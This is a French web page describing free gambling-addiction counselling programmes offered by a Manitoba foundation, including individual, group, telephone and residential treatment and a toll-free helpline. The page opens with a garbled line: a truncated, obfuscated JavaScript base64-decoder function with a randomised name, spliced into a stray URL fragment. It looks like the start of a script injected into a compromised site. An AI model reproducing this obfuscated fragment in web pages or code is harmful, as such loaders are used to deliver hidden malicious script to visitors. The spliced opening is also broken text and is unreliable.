function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.inde/mga-serbisyo-sa-counselling/?lang=fp" />

Services de counselling

Services de counselling

ImageLes Manitobains qui s’inquiètent de leurs propres activités de jeu ou encore des activités de jeu d’un membre de famille ou d’un ami peuvent accéder sans frais à ces services. On propose de nombreux programmes, notamment :Services d’orientation en matière de jeu excessif

Offerte hebdomadairement, cette séance d’information en groupe s’adresse aux gens qui éprouvent des problèmes attribuables soit à leur participation aux jeux de hasard, soit aux activités de jeu de quelqu’un d’autre. Un conseiller de la Fondation fournit de l’information au sujet du jeu excessif et décrit les mécanismes de soutien dont peuvent bénéficier les personnes touchées par les jeux de hasard afin d’éviter d’en subir d’autres conséquences.

Counselling individuel

Confidentiel et offert à titre gratuit, ce service de counselling individuel est destiné aux personnes confrontées à un problème lié à leurs activités de jeu ou aux activités de jeu de quelqu’un d’autre. Des conseillers bien formés sont sur place du lundi au vendredi, de 8 h 30 à 16 h 30.

Groupe de réadaptation des joueurs

Offert à ceux qui sont, depuis un bon moment, en thérapie avec leur conseiller, ce programme de huit semaines a lieu une fois par semaine (dans les locaux de la Fondation). Il a pour but de fournir soutien aux clients et de les sensibiliser aux avantages de mener un mode de vie sans jeux de hasard.

Group de soins permanents

Ces réunions sont une source de soutien continu pour les joueurs qui ont achevé le programme du groupe de réadaptation des joueurs ou le programme en résidence. Les membres du groupe se réunissent avec un conseiller une fois par semaine.

Counselling téléphonique

Le counselling téléphonique est conçu à l’intention des personnes incapables de rencontrer en personne un conseiller. Un rendez-vous est fixé avec un conseiller, après quoi on fait parvenir aux participants une trousse d’information, renfermant entre autres des feuilles d’exercices.

Programme en résidence pour joueurs excessifs

La Fondation propose un programme en résidence de 14 jours destiné aux hommes et aux femmes. Le programme se déroule au Parkwood Treatment Centre, à Brandon, et est ouvert à tous les joueurs excessifs, peu importe où ils vivent dans la province.

Pour avoir accès à n’importe lequel des programmes et services indiqués ci-dessus, prière de téléphoner à la Ligne d’assistance, au 1 800 463-1554 (sans frais au Manitoba). Les appelants qui désirent demander un service d’interprétation sont priés d’aviser le préposé à la Ligne d’assistance de leur choix de langue.

Pour obtenir plus de renseignements au sujet du Programme d’aide aux joueurs offert par la Fondation ou d’autres programmes et services de la Fondation,  clique ici.